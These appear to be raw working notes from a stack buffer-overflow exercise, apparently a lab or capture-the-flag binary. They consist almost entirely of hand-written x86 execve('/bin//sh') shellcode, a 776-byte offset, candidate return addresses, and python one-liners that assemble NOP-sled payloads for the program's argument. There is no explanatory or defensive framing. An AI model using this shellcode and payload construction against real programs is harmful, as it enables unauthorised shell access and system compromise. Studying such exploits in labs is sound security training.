\x31\xC0\xF7\xE9\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x68\x2D\x69\x69\x69\x89\xE6\x50\x56\x53\x89\xE1\xB0\x0B\xCD\x80

774 is the buffer overflow


$(python -c 'print "\x90" * 742 + "\x31\xC0\xF7\xE9\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x68\x2D\x69\x69\x69\x89\xE6\x50\x56\x53\x89\xE1\xB0\x0B\xCD\x80" + "\xd4\xa0\x9d\xff"') 


776 is the total need then the address comes afterwards

address = 0xff9da0d4


the break point is 0x080485e1

$(python -c 'print "A" * 776 + "\xd4\xa0\x9d\xff"') 

ff89a2a0

$(python -c 'print "\x90" * 742 + "\x31\xC0\xF7\xE9\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x68\x2D\x69\x69\x69\x89\xE6\x50\x56\x53\x89\xE1\xB0\x0B\xCD\x80" + "\xa0\xa2\x89\xff"') 

ASLR ENABLED

